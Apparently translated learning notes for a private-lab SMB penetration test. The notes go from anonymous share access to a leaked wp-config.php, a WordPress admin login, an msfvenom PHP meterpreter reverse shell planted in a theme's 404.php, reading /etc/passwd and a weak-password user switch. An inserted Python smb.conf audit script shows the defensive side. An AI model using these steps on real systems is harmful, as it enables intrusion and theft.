Learning notes on SMB penetration testing
1. SMB introduction
SMB (Server Message Block) is a protocol used to exchange information between a client and a server over a network connection. SMB was originally developed by Barry Feigenbaum at IBM; its purpose was to turn the local file interface of the DOS operating system ("Interrupt 13") into a network file system.
(Source: Baidu Encyclopedia)
Setup: Kali attacker machine: 192.168.31.101
Target machine: 192.168.31.62
2. The testing process
(1) Run netdiscover -r 192.168.31.1/24 (the local subnet) to probe the LAN. The target's address is found to be 192.168.31.62.
(2) Run nmap -sV 192.168.31.62 (the target address) to detect the services open on the target.
For more detailed nmap output:
nmap -A -v -T4 192.168.31.62
Examine the SMB service for weaknesses: smbclient -L 192.168.31.62 lists the shares exposed by the target; then fetch deets.txt:
get deets.txt
Save it to the desktop, then open another terminal and open deets.txt from the desktop.
View wp-config.php:
cd /wordpress
get wp-config.php
gedit wp-config.php
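The share that hands out wp-config.php above is an SMB configuration problem, not a protocol bug. As an added example (not part of the original write-up), the following script audits a Samba smb.conf for exactly that weakness: a guest-accessible share plus a global "map to guest" setting that turns failed logins into guest sessions. It shows the weak configuration beside a hardened one; both configs are constructed samples, and the share name and group name are assumptions.

```python
# Added example, not from the original write-up: audit a Samba smb.conf for the
# anonymous-readable-share weakness this lab relies on (constructed samples).
WEAK_CONF = """
[global]
   map to guest = Bad User
[share$]
   path = /var/www
   guest ok = yes
"""
HARDENED_CONF = """
[global]
   map to guest = Never
   restrict anonymous = 2
[share$]
   path = /var/www
   guest ok = no
   valid users = @webadmins
"""

def parse_smb_conf(text):
    conf, section = {}, None  # -> {section: {key: value}}, names lower-cased
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":  # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf[section] = {}
        elif "=" in line and section is not None:
            key, value = line.split("=", 1)
            conf[section][key.strip().lower()] = value.strip()
    return conf

def audit_smb_conf(text):
    """Return (section, finding) pairs for settings that permit anonymous access."""
    conf, findings = parse_smb_conf(text), []
    g = conf.get("global", {})
    # any 'map to guest' value other than Never turns failed logins into guest sessions
    if g.get("map to guest", "never").lower() != "never":
        findings.append(("global", "map to guest = " + g["map to guest"]))
    if g.get("restrict anonymous", "0") != "2":  # 2 refuses anonymous (null) sessions
        findings.append(("global", "restrict anonymous is not 2"))
    shares = {n: o for n, o in conf.items() if n != "global"}
    for name, opts in shares.items():
        if opts.get("guest ok", opts.get("public", "no")).lower() == "yes":  # public = guest ok
            findings.append((name, "guest ok = yes: readable without credentials"))
        elif "valid users" not in opts:
            findings.append((name, "no 'valid users' restriction"))
    return findings
```

Running audit_smb_conf on WEAK_CONF reports the guest fallback, the missing anonymous restriction and the guest-readable share, while HARDENED_CONF produces no findings.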
Try to connect using the MySQL client:
mysql -h 192.168.31.62 -u Admin -p
password: paste the password
ssh [email protected]
paste the password
Both attempts fail.
Because the HTTP service is open, use dirb http://192.168.31.62 to find the link, then open wp-admin.
Log in with the account and password found earlier; the login succeeds.
Generate a webshell:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=4444 -f raw
Copy the generated code into a local file:
gedit shell.php
Start the listener:
msfconsole
Set the parameters:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.31.101 (the attacker machine's address)
run
Started successfully; waiting for the connection.
Upload the webshell code.
After submitting, enter the access path in the browser:
192.168.31.62/wordpress/wp-content/themes/twentyfifteen/404.php
Connection succeeded:
cat /etc/passwd
The togie user is found.
Switch to the togie user; the password is 12345.
Elevate privileges.